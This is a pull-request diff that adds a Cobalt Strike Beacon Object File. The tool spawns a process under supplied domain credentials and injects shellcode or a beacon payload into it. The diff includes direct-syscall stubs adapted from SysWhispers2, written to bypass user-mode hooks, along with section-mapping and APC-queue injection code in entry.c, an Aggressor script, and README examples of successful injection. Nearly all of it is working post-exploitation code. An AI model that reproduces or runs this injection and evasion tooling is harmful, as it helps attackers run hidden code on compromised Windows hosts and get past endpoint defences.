### PR TITLE
Allow APC spawn to use alternate credentials

### DIFF
--- a/StaticSyscallsApcUserSpawn/Makefile
+++ b/StaticSyscallsApcUserSpawn/Makefile
@@ -1,0 +1,6 @@
+BOFNAME := syscallsapcuserspawn
+CC_x64 := x86_64-w64-mingw32-gcc
+
+all:
+	$(CC_x64) -o $(BOFNAME).x64.o -c entry.c -masm=intel
+  

--- a/StaticSyscallsApcUserSpawn/README.md
+++ b/StaticSyscallsApcUserSpawn/README.md
@@ -1,7 +1,9 @@
 ## Spawn with Syscalls Shellcode Injection (NtMapViewOfSection -> NtQueueApcThread) BOF (64-bit only)
 
 NtCreateSection -> NtMapViewOfSection -> NtQueueApcThread -> NtResumeThead.
-Uses `BeaconSpawnTemporaryProcess` to create the target process. 
+Uses `CreateProcessWithLogonW` to create the target process. Spawns as child to current parent process.
+
+
 
 Syscalls generated using @jthuraisamy's [SysWhispers2](https://github.com/jthuraisamy/SysWhispers2), @FalconForce's [SysWhispers2BOF](https://github.com/FalconForceTeam/SysWhispers2BOF) and @Outflanknl's [InlineWhispers](https://github.com/outflanknl/InlineWhispers).
 
@@ -15,17 +17,17 @@ make
 
 ## Usage
 
-Aggressor script included with the following commands:
-- `static_syscalls_apc_spawn listener_name` - Injects shellcode for beacon into a spawned process. 
-- `static_syscalls_apc_shspawn path_to_bin` - Injects custom shellcode into a spawned process.
+Aggressor script included contains the following commands:
+- `static_syscalls_apc_user_spawn listener_name DOMAIN\User Password Path_to_EXE` - Injects shellcode for beacon into a spawned process. 
+- `static_syscalls_apc_user_shspawn path_to_bin DOMAIN\User Password Path_to_EXE` - Injects custom shellcode into a spawned process.
 
-> NOTE: As we're using the beacon API for process spawn, we're not using syscalls, so bear that in mind. Spawning in this way does give us the spawnto, blockdlls and ppid spoofing settings applied though.  
+> NOTE: We're using the CreateProcessWithLogonW API call for process spawning, not BeaconSpawnTemporaryProcess. This is what allows us to specify alternate credentials. 
 
 ### Custom shellcode
 ```
-beacon> static_syscalls_apc_shspawn calc.bin
+beacon> static_syscalls_apc_user_shspawn shell.bin CONTOSO\Admin password123! C:\Windows\System32\notepad.exe
 [*] Syscalls Spawn and Shellcode APC Injection BOF (@ajpc500)
-[*] Reading shellcode from: calc.bin
+[*] Reading shellcode from: shell.bin and spawning as CONTOSO\Admin
 [+] host called home, sent: 6354 bytes
 [+] received output:
 Spawned Process with PID: 10480
@@ -35,7 +37,8 @@ Shellcode injection completed successfully!
 
 ### Beacon shellcode
 ```
-beacon> static_syscalls_apc_spawn http
+beacon> static_syscalls_apc_user_spawn http CONTOSO\Admin password123! C:\Windows\System32\svchost.exe
+[+] Spawning and injecting into C:\Windows\System32\svchost.exe as CONTOS\Admin
 [*] Syscalls Spawn and Shellcode APC Injection BOF (@ajpc500)
 [*] Using http listener for beacon shellcode generation.
 [+] host called home, sent: 267710 bytes
@@ -44,3 +47,8 @@ Spawned Process with PID: 8648
 [+] received output:
 Shellcode injection completed successfully!
 ```
+
+# TODO
+`ppid spoofing`
+
+Don't know how to get `STARTUPINFOEX` to play nicely with `CreateProcessWithLogonW`.

--- a/StaticSyscallsApcUserSpawn/README.md
+++ b/StaticSyscallsApcUserSpawn/README.md
@@ -1,0 +1,46 @@
+## Spawn with Syscalls Shellcode Injection (NtMapViewOfSection -> NtQueueApcThread) BOF (64-bit only)
+
+NtCreateSection -> NtMapViewOfSection -> NtQueueApcThread -> NtResumeThead.
+Uses `BeaconSpawnTemporaryProcess` to create the target process. 
+
+Syscalls generated using @jthuraisamy's [SysWhispers2](https://github.com/jthuraisamy/SysWhispers2), @FalconForce's [SysWhispers2BOF](https://github.com/FalconForceTeam/SysWhispers2BOF) and @Outflanknl's [InlineWhispers](https://github.com/outflanknl/InlineWhispers).
+
+Code adapted from @peperunas's [injectopi](https://github.com/peperunas/injectopi/blob/master/CreateSectionAPC/CreateSectionAPC.cpp)
+
+## Compile
+
+```
+make
+```
+
+## Usage
+
+Aggressor script included with the following commands:
+- `static_syscalls_apc_spawn listener_name` - Injects shellcode for beacon into a spawned process. 
+- `static_syscalls_apc_shspawn path_to_bin` - Injects custom shellcode into a spawned process.
+
+> NOTE: As we're using the beacon API for process spawn, we're not using syscalls, so bear that in mind. Spawning in this way does give us the spawnto, blockdlls and ppid spoofing settings applied though.  
+
+### Custom shellcode
+```
+beacon> static_syscalls_apc_shspawn calc.bin
+[*] Syscalls Spawn and Shellcode APC Injection BOF (@ajpc500)
+[*] Reading shellcode from: calc.bin
+[+] host called home, sent: 6354 bytes
+[+] received output:
+Spawned Process with PID: 10480
+[+] received output:
+Shellcode injection completed successfully!
+```
+
+### Beacon shellcode
+```
+beacon> static_syscalls_apc_spawn http
+[*] Syscalls Spawn and Shellcode APC Injection BOF (@ajpc500)
+[*] Using http listener for beacon shellcode generation.
+[+] host called home, sent: 267710 bytes
+[+] received output:
+Spawned Process with PID: 8648
+[+] received output:
+Shellcode injection completed successfully!
+```

--- a/StaticSyscallsApcUserSpawn/Syscalls.h
+++ b/StaticSyscallsApcUserSpawn/Syscalls.h
@@ -1,0 +1,455 @@
+#pragma once
+
+// Code below is adapted from @modexpblog. Read linked article for more details.
+// https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams
+
+#ifndef SW2_HEADER_H_
+#define SW2_HEADER_H_
+
+#include <windows.h>
+
+#define SW2_SEED 0xB54F107D
+#define SW2_ROL8(v) (v << 8 | v >> 24)
+#define SW2_ROR8(v) (v >> 8 | v << 24)
+#define SW2_ROX8(v) ((SW2_SEED % 2) ? SW2_ROL8(v) : SW2_ROR8(v))
+#define SW2_MAX_ENTRIES 500
+#define SW2_RVA2VA(Type, DllBase, Rva) (Type)((ULONG_PTR) DllBase + Rva)
+
+#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
+#define STATUS_SUCCESS 0
+
+WINBASEAPI void *__cdecl MSVCRT$memcpy(void * __restrict__ _Dst,const void * __restrict__ _Src,size_t _MaxCount);
+WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count);
+
+typedef struct _UNICODE_STRING
+{
+	USHORT Length;
+	USHORT MaximumLength;
+	PWSTR  Buffer;
+} UNICODE_STRING, *PUNICODE_STRING;
+
+#ifndef InitializeObjectAttributes
+#define InitializeObjectAttributes( p, n, a, r, s ) { \
+	(p)->Length = sizeof( OBJECT_ATTRIBUTES );        \
+	(p)->RootDirectory = r;                           \
+	(p)->Attributes = a;                              \
+	(p)->ObjectName = n;                              \
+	(p)->SecurityDescriptor = s;                      \
+	(p)->SecurityQualityOfService = NULL;             \
+}
+#endif
+
+typedef struct _PS_ATTRIBUTE
+{
+	ULONG  Attribute;
+	SIZE_T Size;
+	union
+	{
+		ULONG Value;
+		PVOID ValuePtr;
+	} u1;
+	PSIZE_T ReturnLength;
+} PS_ATTRIBUTE, *PPS_ATTRIBUTE;
+
+typedef struct _OBJECT_ATTRIBUTES
+{
+	ULONG           Length;
+	HANDLE          RootDirectory;
+	PUNICODE_STRING ObjectName;
+	ULONG           Attributes;
+	PVOID           SecurityDescriptor;
+	PVOID           SecurityQualityOfService;
+} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
+
+typedef struct _CLIENT_ID
+{
+	HANDLE UniqueProcess;
+	HANDLE UniqueThread;
+} CLIENT_ID, *PCLIENT_ID;
+
+typedef struct _PS_ATTRIBUTE_LIST
+{
+	SIZE_T       TotalLength;
+	PS_ATTRIBUTE Attributes[1];
+} PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;
+
+typedef struct _IO_STATUS_BLOCK
+{
+	union
+	{
+		NTSTATUS Status;
+		VOID*    Pointer;
+	};
+	ULONG_PTR Information;
+} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
+
+typedef VOID(KNORMAL_ROUTINE) (
+	IN PVOID NormalContext,
+	IN PVOID SystemArgument1,
+	IN PVOID SystemArgument2);
+
+typedef VOID(NTAPI* PIO_APC_ROUTINE) (
+	IN PVOID            ApcContext,
+	IN PIO_STATUS_BLOCK IoStatusBlock,
+	IN ULONG            Reserved);
+
+typedef KNORMAL_ROUTINE* PKNORMAL_ROUTINE;
+
+
+// Typedefs are prefixed to avoid pollution.
+typedef struct _SW2_SYSCALL_ENTRY
+{
+    DWORD Hash;
+    DWORD Address;
+} SW2_SYSCALL_ENTRY, *PSW2_SYSCALL_ENTRY;
+
+typedef struct _SW2_SYSCALL_LIST
+{
+    DWORD Count;
+    SW2_SYSCALL_ENTRY Entries[SW2_MAX_ENTRIES];
+} SW2_SYSCALL_LIST, *PSW2_SYSCALL_LIST;
+
+typedef struct _SW2_PEB_LDR_DATA {
+	BYTE Reserved1[8];
+	PVOID Reserved2[3];
+	LIST_ENTRY InMemoryOrderModuleList;
+} SW2_PEB_LDR_DATA, *PSW2_PEB_LDR_DATA;
+
+typedef struct _SW2_LDR_DATA_TABLE_ENTRY {
+	PVOID Reserved1[2];
+	LIST_ENTRY InMemoryOrderLinks;
+	PVOID Reserved2[2];
+	PVOID DllBase;
+} SW2_LDR_DATA_TABLE_ENTRY, *PSW2_LDR_DATA_TABLE_ENTRY;
+
+typedef struct _SW2_PEB {
+	BYTE Reserved1[2];
+	BYTE BeingDebugged;
+	BYTE Reserved2[1];
+	PVOID Reserved3[2];
+	PSW2_PEB_LDR_DATA Ldr;
+} SW2_PEB, *PSW2_PEB;
+
+DWORD SW2_HashSyscall(PCSTR FunctionName);
+BOOL SW2_PopulateSyscallList();
+EXTERN_C DWORD SW2_GetSyscallNumber(DWORD FunctionHash);
+
+typedef VOID(KNORMAL_ROUTINE) (
+	IN PVOID NormalContext,
+	IN PVOID SystemArgument1,
+	IN PVOID SystemArgument2);
+
+
+#ifndef InitializeObjectAttributes
+#define InitializeObjectAttributes( p, n, a, r, s ) { \
+	(p)->Length = sizeof( OBJECT_ATTRIBUTES );        \
+	(p)->RootDirectory = r;                           \
+	(p)->Attributes = a;                              \
+	(p)->ObjectName = n;                              \
+	(p)->SecurityDescriptor = s;                      \
+	(p)->SecurityQualityOfService = NULL;             \
+}
+#endif
+
+
+typedef KNORMAL_ROUTINE* PKNORMAL_ROUTINE;
+
+typedef enum _SECTION_INHERIT
+{
+	ViewShare = 1,
+	ViewUnmap = 2
+} SECTION_INHERIT, *PSECTION_INHERIT;
+
+
+EXTERN_C NTSTATUS NtClose(
+	IN HANDLE Handle);
+
+EXTERN_C NTSTATUS NtOpenProcess(
+	OUT PHANDLE ProcessHandle,
+	IN ACCESS_MASK DesiredAccess,
+	IN POBJECT_ATTRIBUTES ObjectAttributes,
+	IN PCLIENT_ID ClientId OPTIONAL);
+
+EXTERN_C NTSTATUS NtQueueApcThread(
+	IN HANDLE ThreadHandle,
+	IN PKNORMAL_ROUTINE ApcRoutine,
+	IN PVOID ApcArgument1 OPTIONAL,
+	IN PVOID ApcArgument2 OPTIONAL,
+	IN PVOID ApcArgument3 OPTIONAL);
+
+EXTERN_C NTSTATUS NtResumeThread(
+	IN HANDLE ThreadHandle,
+	IN OUT PULONG PreviousSuspendCount OPTIONAL);
+
+EXTERN_C NTSTATUS NtCreateSection(
+	OUT PHANDLE SectionHandle,
+	IN ACCESS_MASK DesiredAccess,
+	IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
+	IN PLARGE_INTEGER MaximumSize OPTIONAL,
+	IN ULONG SectionPageProtection,
+	IN ULONG AllocationAttributes,
+	IN HANDLE FileHandle OPTIONAL);
+
+EXTERN_C NTSTATUS NtMapViewOfSection(
+	IN HANDLE SectionHandle,
+	IN HANDLE ProcessHandle,
+	IN OUT PVOID BaseAddress,
+	IN ULONG ZeroBits,
+	IN SIZE_T CommitSize,
+	IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
+	IN OUT PSIZE_T ViewSize,
+	IN SECTION_INHERIT InheritDisposition,
+	IN ULONG AllocationType,
+	IN ULONG Win32Protect);
+
+EXTERN_C NTSTATUS NtUnmapViewOfSection(
+	IN HANDLE ProcessHandle,
+	IN PVOID BaseAddress);
+
+#endif
+
+
+// Code below is adapted from @modexpblog. Read linked article for more details.
+// https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams
+
+SW2_SYSCALL_LIST SW2_SyscallList = {0,1};
+
+DWORD SW2_HashSyscall(PCSTR FunctionName)
+{
+    DWORD i = 0;
+    DWORD Hash = SW2_SEED;
+
+    while (FunctionName[i])
+    {
+        WORD PartialName = *(WORD*)((ULONG64)FunctionName + i++);
+        Hash ^= PartialName + SW2_ROR8(Hash);
+    }
+
+    return Hash;
+}
+
+BOOL SW2_PopulateSyscallList()
+{
+    // Return early if the list is already populated.
+    if (SW2_SyscallList.Count) return TRUE;
+
+    PSW2_PEB Peb = (PSW2_PEB)__readgsqword(0x60);
+    PSW2_PEB_LDR_DATA Ldr = Peb->Ldr;
+    PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;
+    PVOID DllBase = NULL;
+
+    // Get the DllBase address of NTDLL.dll. NTDLL is not guaranteed to be the second
+    // in the list, so it's safer to loop through the full list and find it.
+    PSW2_LDR_DATA_TABLE_ENTRY LdrEntry;
+    for (LdrEntry = (PSW2_LDR_DATA_TABLE_ENTRY)Ldr->Reserved2[1]; LdrEntry->DllBase != NULL; LdrEntry = (PSW2_LDR_DATA_TABLE_ENTRY)LdrEntry->Reserved1[0])
+    {
+        DllBase = LdrEntry->DllBase;
+        PIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)DllBase;
+        PIMAGE_NT_HEADERS NtHeaders = SW2_RVA2VA(PIMAGE_NT_HEADERS, DllBase, DosHeader->e_lfanew);
+        PIMAGE_DATA_DIRECTORY DataDirectory = (PIMAGE_DATA_DIRECTORY)NtHeaders->OptionalHeader.DataDirectory;
+        DWORD VirtualAddress = DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
+        if (VirtualAddress == 0) continue;
+
+        ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)SW2_RVA2VA(ULONG_PTR, DllBase, VirtualAddress);
+
+        // If this is NTDLL.dll, exit loop.
+        PCHAR DllName = SW2_RVA2VA(PCHAR, DllBase, ExportDirectory->Name);
+
+        if ((*(ULONG*)DllName | 0x20202020) != 'ldtn') continue;
+        if ((*(ULONG*)(DllName + 4) | 0x20202020) == 'ld.l') break;
+    }
+
+    if (!ExportDirectory) return FALSE;
+
+    DWORD NumberOfNames = ExportDirectory->NumberOfNames;
+    PDWORD Functions = SW2_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfFunctions);
+    PDWORD Names = SW2_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfNames);
+    PWORD Ordinals = SW2_RVA2VA(PWORD, DllBase, ExportDirectory->AddressOfNameOrdinals);
+
+    // Populate SW2_SyscallList with unsorted Zw* entries.
+    DWORD i = 0;
+    PSW2_SYSCALL_ENTRY Entries = SW2_SyscallList.Entries;
+    do
+    {
+        PCHAR FunctionName = SW2_RVA2VA(PCHAR, DllBase, Names[NumberOfNames - 1]);
+
+        // Is this a system call?
+        if (*(USHORT*)FunctionName == 'wZ')
+        {
+            Entries[i].Hash = SW2_HashSyscall(FunctionName);
+            Entries[i].Address = Functions[Ordinals[NumberOfNames - 1]];
+
+            i++;
+            if (i == SW2_MAX_ENTRIES) break;
+        }
+    } while (--NumberOfNames);
+
+    // Save total number of system calls found.
+    SW2_SyscallList.Count = i;
+
+    // Sort the list by address in ascending order.
+    for (DWORD i = 0; i < SW2_SyscallList.Count - 1; i++)
+    {
+        for (DWORD j = 0; j < SW2_SyscallList.Count - i - 1; j++)
+        {
+            if (Entries[j].Address > Entries[j + 1].Address)
+            {
+                // Swap entries.
+                SW2_SYSCALL_ENTRY TempEntry;
+
+                TempEntry.Hash = Entries[j].Hash;
+                TempEntry.Address = Entries[j].Address;
+
+                Entries[j].Hash = Entries[j + 1].Hash;
+                Entries[j].Address = Entries[j + 1].Address;
+
+                Entries[j + 1].Hash = TempEntry.Hash;
+                Entries[j + 1].Address = TempEntry.Address;
+            }
+        }
+    }
+
+    return TRUE;
+}
+
+EXTERN_C DWORD SW2_GetSyscallNumber(DWORD FunctionHash)
+{
+    // Ensure SW2_SyscallList is populated.
+    if (!SW2_PopulateSyscallList()) return -1;
+
+    for (DWORD i = 0; i < SW2_SyscallList.Count; i++)
+    {
+        if (FunctionHash == SW2_SyscallList.Entries[i].Hash)
+        {
+            return i;
+        }
+    }
+
+    return -1;
+}
+#define ZwClose NtClose
+__asm__("NtClose: \n\
+	mov [rsp +8], rcx\n\
+	mov [rsp+16], rdx\n\
+	mov [rsp+24], r8\n\
+	mov [rsp+32], r9\n\
+	sub rsp, 0x28\n\
+	mov ecx, 0x070DA6729\n\
+	call SW2_GetSyscallNumber\n\
+	add rsp, 0x28\n\
+	mov rcx, [rsp +8]\n\
+	mov rdx, [rsp+16]\n\
+	mov r8, [rsp+24]\n\
+	mov r9, [rsp+32]\n\
+	mov r10, rcx\n\
+	syscall\n\
+	ret\n\
+");
+#define ZwOpenProcess NtOpenProcess
+__asm__("NtOpenProcess: \n\
+	mov [rsp +8], rcx\n\
+	mov [rsp+16], rdx\n\
+	mov [rsp+24], r8\n\
+	mov [rsp+32], r9\n\
+	sub rsp, 0x28\n\
+	mov ecx, 0x0EDA60CFB\n\
+	call SW2_GetSyscallNumber\n\
+	add rsp, 0x28\n\
+	mov rcx, [rsp +8]\n\
+	mov rdx, [rsp+16]\n\
+	mov r8, [rsp+24]\n\
+	mov r9, [rsp+32]\n\
+	mov r10, rcx\n\
+	syscall\n\
+	ret\n\
+");
+#define ZwQueueApcThread NtQueueApcThread
+__asm__("NtQueueApcThread: \n\
+	mov [rsp +8], rcx\n\
+	mov [rsp+16], rdx\n\
+	mov [rsp+24], r8\n\
+	mov [rsp+32], r9\n\
+	sub rsp, 0x28\n\
+	mov ecx, 0x07552EB60\n\
+	call SW2_GetSyscallNumber\n\
+	add rsp, 0x28\n\
+	mov rcx, [rsp +8]\n\
+	mov rdx, [rsp+16]\n\
+	mov r8, [rsp+24]\n\
+	mov r9, [rsp+32]\n\
+	mov r10, rcx\n\
+	syscall\n\
+	ret\n\
+");
+#define ZwResumeThread NtResumeThread
+__asm__("NtResumeThread: \n\
+	mov [rsp +8], rcx\n\
+	mov [rsp+16], rdx\n\
+	mov [rsp+24], r8\n\
+	mov [rsp+32], r9\n\
+	sub rsp, 0x28\n\
+	mov ecx, 0x0B12AA59A\n\
+	call SW2_GetSyscallNumber\n\
+	add rsp, 0x28\n\
+	mov rcx, [rsp +8]\n\
+	mov rdx, [rsp+16]\n\
+	mov r8, [rsp+24]\n\
+	mov r9, [rsp+32]\n\
+	mov r10, rcx\n\
+	syscall\n\
+	ret\n\
+");
+#define ZwCreateSection NtCreateSection
+__asm__("NtCreateSection: \n\
+	mov [rsp +8], rcx\n\
+	mov [rsp+16], rdx\n\
+	mov [rsp+24], r8\n\
+	mov [rsp+32], r9\n\
+	sub rsp, 0x28\n\
+	mov ecx, 0x00288061B\n\
+	call SW2_GetSyscallNumber\n\
+	add rsp, 0x28\n\
+	mov rcx, [rsp +8]\n\
+	mov rdx, [rsp+16]\n\
+	mov r8, [rsp+24]\n\
+	mov r9, [rsp+32]\n\
+	mov r10, rcx\n\
+	syscall\n\
+	ret\n\
+");
+#define ZwMapViewOfSection NtMapViewOfSection
+__asm__("NtMapViewOfSection: \n\
+	mov [rsp +8], rcx\n\
+	mov [rsp+16], rdx\n\
+	mov [rsp+24], r8\n\
+	mov [rsp+32], r9\n\
+	sub rsp, 0x28\n\
+	mov ecx, 0x00A540F3F\n\
+	call SW2_GetSyscallNumber\n\
+	add rsp, 0x28\n\
+	mov rcx, [rsp +8]\n\
+	mov rdx, [rsp+16]\n\
+	mov r8, [rsp+24]\n\
+	mov r9, [rsp+32]\n\
+	mov r10, rcx\n\
+	syscall\n\
+	ret\n\
+");
+#define ZwUnmapViewOfSection NtUnmapViewOfSection
+__asm__("NtUnmapViewOfSection: \n\
+	mov [rsp +8], rcx\n\
+	mov [rsp+16], rdx\n\
+	mov [rsp+24], r8\n\
+	mov [rsp+32], r9\n\
+	sub rsp, 0x28\n\
+	mov ecx, 0x0168B301F\n\
+	call SW2_GetSyscallNumber\n\
+	add rsp, 0x28\n\
+	mov rcx, [rsp +8]\n\
+	mov rdx, [rsp+16]\n\
+	mov r8, [rsp+24]\n\
+	mov r9, [rsp+32]\n\
+	mov r10, rcx\n\
+	syscall\n\
+	ret\n\
+");

--- a/StaticSyscallsApcUserSpawn/beacon.h
+++ b/StaticSyscallsApcUserSpawn/beacon.h
@@ -1,0 +1,62 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Cobalt Strike 4.1.
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_ERROR       0x0d
+#define CALLBACK_OUTPUT_UTF8 0x20
+
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess (BOOL x86, BOOL ignoreToken, STARTUPINFO * sInfo, PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

--- a/StaticSyscallsApcUserSpawn/entry.c
+++ b/StaticSyscallsApcUserSpawn/entry.c
@@ -1,0 +1,109 @@
+#include <windows.h>
+#include <stdio.h>
+#include "beacon.h"
+#include "Syscalls.h"
+
+WINADVAPI WINBOOL WINAPI ADVAPI32$CreateProcessWithLogonW (LPCWSTR lpUsername, LPCWSTR lpDomain, LPCWSTR lpPassword, DWORD dwLogonFlags, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
+
+BOOL SpawnProcess(PROCESS_INFORMATION * pInfo, LPCWSTR user, LPCWSTR domain, LPCWSTR pass, LPCWSTR exe) {
+    BOOL success = FALSE;
+
+    STARTUPINFOW sInfo={sizeof(sInfo)};
+    success = ADVAPI32$CreateProcessWithLogonW (user, domain, pass, LOGON_WITH_PROFILE, exe, NULL, 0, NULL, NULL, &sInfo, pInfo); 
+
+    if(success) {
+      BeaconPrintf(CALLBACK_OUTPUT, "Spawned Process with PID: %d", pInfo->dwProcessId);
+    } else {
+      BeaconPrintf(CALLBACK_ERROR, "Failed to spawn process.");
+    }
+    return success;
+}
+
+VOID InjectShellcode(PROCESS_INFORMATION * pInfo, char* sc_ptr, SIZE_T sc_len) {
+    HANDLE            scHandle = NULL;
+    NTSTATUS          nts;
+    LARGE_INTEGER     li;
+    PVOID scSection = NULL, injectedBaseAddress = NULL;
+   	SIZE_T viewSize = 0;
+
+    li.HighPart = 0;
+    li.LowPart = sc_len;
+
+    sc_len++;
+
+    // Allocating Read-Write-eXecute (RWX) memory for shellcode (opsec 101)    
+    if (nts = NtCreateSection(&scHandle, SECTION_ALL_ACCESS, NULL, &li,
+		PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL) != STATUS_SUCCESS) {
+          BeaconPrintf(CALLBACK_ERROR,"NtCreateSection - FAILED! %08X\n", nts);
+          return;
+        }
+
+    // Map view in current process
+    if (nts = NtMapViewOfSection(scHandle, NtCurrentProcess(), &scSection, 
+      0, 0, NULL, &viewSize, 1, 0, PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS){
+        BeaconPrintf(CALLBACK_ERROR,"NtMapViewOfSection - FAILED! %08X\n", nts);
+        NtClose(scHandle);
+        return;
+      }
+
+    // Copy shellcode into this mapped section
+    MSVCRT$memcpy(scSection, sc_ptr, sc_len);
+    
+    // Map view in remote process
+    if (nts = NtMapViewOfSection(scHandle, pInfo->hProcess, &injectedBaseAddress, 0,
+    0, 0, &viewSize, 1, 0, PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS) {
+        BeaconPrintf(CALLBACK_ERROR,"NtMapViewOfSection2 - FAILED! %08X\n", nts);
+        NtClose(scHandle);
+        return;
+      }
+
+    // Unmap view with shellcode now written to remote process
+    if (nts = NtUnmapViewOfSection(NtCurrentProcess(), scSection) != STATUS_SUCCESS) {
+        BeaconPrintf(CALLBACK_ERROR,"NtUnmapViewOfSection - FAILED! %08X\n", nts);
+        NtClose(scHandle);
+        return;
+      }
+
+    NtClose(scHandle);
+  
+    // Queue APC
+    if (nts = NtQueueApcThread(pInfo->hThread, injectedBaseAddress, 0, NULL, NULL) != STATUS_SUCCESS) {
+        BeaconPrintf(CALLBACK_ERROR,"NtQueueApcThread - FAILED! %08X\n", nts);
+        return;
+      }
+    
+    // Resume suspended process with thread executing
+    if (nts = NtResumeThread(pInfo->hThread, NULL) != STATUS_SUCCESS) {
+      BeaconPrintf(CALLBACK_ERROR,"NtResumeThread - FAILED! %08X\n", nts);
+      return;
+    }
+
+    // Head back to base for debriefing and cocktails
+    BeaconPrintf(CALLBACK_OUTPUT, "Shellcode injection completed successfully!");   
+}
+
+void go(char *args, int len) {
+    char* sc_ptr;
+    LPCWSTR domain;
+    LPCWSTR user;
+    LPCWSTR pass;
+    LPCWSTR exe;
+    SIZE_T sc_len; 
+    datap parser;
+    PROCESS_INFORMATION processInformation;
+
+    BeaconDataParse(&parser, args, len);
+    sc_len = BeaconDataLength(&parser);
+    sc_ptr = BeaconDataExtract(&parser, NULL);
+    domain = (wchar_t*)BeaconDataExtract(&parser, NULL);
+    user   = (wchar_t*)BeaconDataExtract(&parser, NULL);
+    pass   = (wchar_t*)BeaconDataExtract(&parser, NULL);
+    exe    = (wchar_t*)BeaconDataExtract(&parser, NULL);
+	
+    if(SpawnProcess(&processInformation, user, domain, pass, exe)){
+      InjectShellcode(&processInformation, sc_ptr, sc_len);
+      BeaconCleanupProcess(&processInformation);
+    } else {
+      BeaconPrintf(CALLBACK_ERROR, "Failed to spawn process. Exiting...");
+    }
+}

--- a/StaticSyscallsApcUserSpawn/static_syscalls_apc_user_spawn.cna
+++ b/StaticSyscallsApcUserSpawn/static_syscalls_apc_user_spawn.cna
@@ -1,0 +1,98 @@
+beacon_command_register(
+"static_syscalls_apc_user_shspawn", 
+"Spawn process and use syscalls to execute custom shellcode launch with Nt functions (NtMapViewOfSection -> NtQueueUserApc).", 
+"Synopsis: static_syscalls_apc_shspawn path_to_bin DOMAIN\\User Password Path_to_EXE");
+
+beacon_command_register(
+"static_syscalls_apc_user_spawn", 
+"Spawn process and use syscalls to execute beacon shellcode launch with Nt functions (NtMapViewOfSection -> NtQueueUserApc).", 
+"Synopsis: static_syscalls_apc_spawn listener_name DOMAIN\\User Password Path_to_EXE");
+
+alias static_syscalls_apc_user_shspawn {
+	local('$handle $data $args $sc_data $domain $user $pass $exe');
+
+        # parse arguments
+        # $2 = sc_data
+        # $3 = Domain\User
+        # $4 = password
+        # $5 = executable path
+
+        ($domain, $user) = split('\\\\', $3);
+        $pass            = $4;
+
+        # Escapes single '\' with '\\' so entry.c parses correctly
+        $exe             = strrep($5, '\\', '\\\\');
+
+        if (size(@_) <= 4) {
+        	berror($1, "Not enough arguments.");
+                return;
+        } 
+	
+	# figure out the arch of this session
+	$barch  = barch($1);
+	
+	# read in the right BOF file
+	$handle = openf(script_resource("syscallsapcuserspawn. $+ $barch $+ .o"));
+	$data = readb($handle, -1);
+	closef($handle);
+
+	$sc_handle = openf($2);
